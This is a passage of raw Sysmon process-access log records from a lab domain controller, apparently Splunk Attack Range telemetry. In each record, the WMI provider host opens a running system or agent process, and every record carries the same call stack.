Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 